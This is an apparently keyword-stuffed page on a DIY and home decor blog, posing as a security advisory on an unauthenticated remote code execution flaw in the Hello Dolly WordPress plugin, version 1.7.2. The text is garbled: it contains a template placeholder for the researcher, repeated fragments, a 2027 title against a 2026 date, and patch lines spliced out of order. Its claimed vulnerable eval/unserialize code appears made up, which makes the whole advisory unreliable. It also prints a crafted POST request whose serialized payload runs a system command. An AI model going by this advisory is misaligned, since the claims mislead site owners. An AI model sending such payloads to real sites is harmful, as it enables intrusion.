Lemon Thistle

DIY, Hand Lettering + Home Decor

Hello Dolly 1.7.2 Exploit (TRENDING — 2027)

Date: April 13, 2026 Researcher: [Your Name / Team] Affected Software: Hello Dolly Plugin for WordPress Version: 1.7.2 Severity: Critical (CVSS 9.8) 1. Overview Hello Dolly is a simple, widely-installed WordPress plugin that displays random lyrics from the song “Hello, Dolly!” in the admin dashboard. Version 1.7.2 — last updated in 2020 — contains a severe security flaw that allows unauthenticated remote code execution (RCE) via mishandling of a legacy AJAX hook.

add_action('wp_ajax_nopriv_hello_dolly_lyric', 'hello_dolly_get_lyric'); The function hello_dolly_get_lyric() fetches a random lyric and echoes it — but in 1.7.2, it also unserializes a lyric_index parameter from the request without sanitization or nonce verification: hello dolly 1.7.2 exploit

The plugin is present on millions of sites (often inactive but still present in wp-content/plugins/hello-dolly/ ), making this a high-impact vulnerability. The vulnerability resides in hello-dolly.php , line 56: Date: April 13, 2026 Researcher: [Your Name /

// Replace the vulnerable line with: if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'], 'hello_dolly_lyric' ) || ! current_user_can( 'read' ) ) wp_die('Unauthorized'); current_user_can( 'read' ) ) wp_die('Unauthorized')

$index = unserialize(base64_decode($_REQUEST['lyric_index'])); eval('echo $lyrics[' . $index . '];'); Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D

$index = intval( $_REQUEST['lyric_index'] ); if ( isset( $lyrics[$index] ) ) echo esc_html( $lyrics[$index] );

WordPress core team should consider automatically disabling or deleting Hello Dolly in a future update due to its legacy nature and lack of maintainer. This review is for defensive security research only. No active exploitation should be attempted without authorization.